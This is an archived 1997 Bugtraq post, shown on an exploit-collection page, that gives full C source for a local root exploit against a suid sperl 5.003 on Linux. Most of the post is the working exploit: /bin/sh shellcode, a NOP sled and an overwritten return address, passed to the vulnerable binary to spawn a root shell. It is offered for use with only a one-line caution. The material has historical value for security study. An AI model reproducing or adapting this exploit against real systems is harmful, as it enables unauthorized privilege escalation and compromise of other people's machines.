Linux exploit code for the already known buffer overflow in sperl 5.003
| Description: | Linux exploit code for the already known buffer overflow in sperl 5.003 |
| Author: | ggajic@FREENET.NETHER.NET |
| Compromise: | root (local) |
| Vulnerable Systems: | Those with sperl 5.003 installed suid, the exploit is for linux |
| Date: | 2 September 1997 |
Date: Tue, 2 Sep 1997 11:34:35 -0400
From: ggajic@FREENET.NETHER.NET
To: BUGTRAQ@NETSPACE.ORG
Hi,
I have seen sperl exploit for FreeBSD but not for Linux.Well, here it is.
I'm sorry if it was already posted or discovered befor.
/* Linux sperl5.003 buffer overflow by ggajic@freenet.nether.net
based on Aleph1's buffer overflow code
use it in responsible manner
tested on slackware 3.1 and slackware 3.2 */
#include <stdlib.h>
#define DEFAULT_OFFSET 640
#define DEFAULT_BUFFER_SIZE 1600
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL);
}
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
